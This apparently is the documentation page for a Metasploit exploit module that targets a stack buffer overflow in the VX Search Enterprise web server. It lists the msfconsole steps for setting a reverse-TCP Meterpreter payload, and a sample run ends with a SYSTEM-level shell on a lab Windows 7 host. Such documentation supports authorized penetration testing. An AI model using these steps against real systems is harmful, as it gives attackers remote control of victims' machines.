2.7 KiB
2.7 KiB
Vulnerable Application
VX Search Enterprise versions up to v9.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at VX Search Enterprise.
Verification Steps
- Install a vulnerable VX Search Enterprise
- Start
VX Search Enterprise
service - Start
VX Search Enterprise
client application - Navigate to
Tools
>VX Search Options
>Server
- Check
Enable Web Server On Port 80
to start the web interface - Start
msfconsole
- Do
use exploit/windows/http/vxsrchs_bof
- Do
set RHOST ip
- Do
check
- Verify the target is vulnerable
- Do
set PAYLOAD windows/meterpreter/reverse_tcp
- Do
set LHOST ip
- Do
exploit
- Verify the Meterpreter session is opened
Scenarios
VX Search Enterprise v9.5.12 on Windows 7 SP1
msf exploit(vxsrchs_bof) > show options
Module options (exploit/windows/http/vxsrchs_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 172.16.0.18 yes The target address
RPORT 80 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.0.20 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 VX Search Enterprise v9.5.12
msf exploit(vxsrchs_bof) > exploit
[*] Started reverse TCP handler on 172.16.0.20:4444
[*] Sending request...
[*] Sending stage (958324 bytes) to 172.16.0.18
[*] Meterpreter session 1 opened (172.16.0.20:4444 -> 172.16.0.18:49162) at 2017-05-18 16:10:58 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : PC-01
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : pt_PT
Domain : LAB
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >